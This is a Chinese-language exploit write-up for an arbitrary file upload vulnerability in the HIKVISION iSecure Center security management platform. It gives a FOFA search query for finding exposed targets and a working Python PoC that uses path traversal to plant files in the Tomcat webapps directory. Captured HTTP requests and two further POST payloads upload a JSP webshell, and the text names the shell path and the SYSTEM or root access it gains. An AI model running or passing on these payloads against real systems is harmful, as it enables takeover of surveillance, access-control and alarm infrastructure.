**2. 漏洞描述** HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞 **3. 影响版本** HIKVISION iSecure Center综合安防管理平台,在野。 **4. fofa查询语句** icon_hash=“-808437027” app=“HIKVISION-iSecure-Center” ## **5. 漏洞复现** EXP/POC:payload.py 脚本 走127.0.0.1:8080 代理,方便burpsuit抓包。 ``` #!usr/bin/env python # *-* coding:utf-8 *-* import sys import requests import string import random import urllib3 urllib3.disable_warnings() proxies = { 'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理,方便burpsuit抓包 } def run(arg): try: flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9)) filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10)) vuln_url=arg+"center/api/files;.js" headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'} file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')} r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies) if r.status_code==200 and "webapps/clusterMgr" in r.text: payload=f"clusterMgr/{filename}.txt;.js" url=arg+payload r2 = requests.get(url, timeout=15, verify=False, proxies=proxies) if r2.status_code==200 and flag in r2.text: print('\033[1;31;40m') print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}") print('\033[0m') else: print(arg+":不存在漏洞") except: print(arg+":不存在漏洞") if __name__ == '__main__': url=sys.argv[1] run(url) ``` ## **6. burpsuit抓包分析** burpsuit 127.0.0.1:8080抓包,抓取post 包一个,get 请求包一个。 payload:请求数据包 ``` POST /center/api/files;.js HTTP/1.1 Host: x.x.x.x User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Length: 258 Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4 --e54e7e5834c8c50e92189959fe7227a4 Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt" Content-Type: application/octet-stream 9YPQ3I3ZS --e54e7e5834c8c50e92189959fe7227a4-- ``` **payload的返回数据包。** ``` HTTP/1.1 200 Server: openresty/1.13.6.2 Date: Fri, 14 Jul 2023 04:35:23 GMT Content-Type: application/json;charset=UTF-8 Content-Length: 335 Connection: close Set-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnly Content-Language: en_US Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Content-Disposition: inline;filename=f.txt {"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ ``` 访问漏洞链接:https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js ,查看是否上传成功。 因为Hikvision平台使用的中间件为tomcat,修改报文和文件名,所以实现上传哥斯拉生成jsp。 宿主服务器windows和linux都可使用。windows 拿到的账户是system账户,linux为root。 Hikvison账户管理密码的后渗透操作:海康威视综合安防后渗透利用技巧 POC2 ``` POST /center/api/files;.html HTTP/1.1 Host: 10.10.10.10 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a ------WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%jsp的马%> ------WebKitFormBoundary9PggsiM755PLa54a-- ``` **report 任意文件上传漏洞** ``` POST /svm/api/external/report HTTP/1.1 Host: 10.10.10.10 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a ------WebKitFormBoundary9PggsiM755PLa54a Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip <%jsp的马%> ------WebKitFormBoundary9PggsiM755PLa54a-- ``` **马儿路径:/portal/ui/login/..;/..;/new.jsp**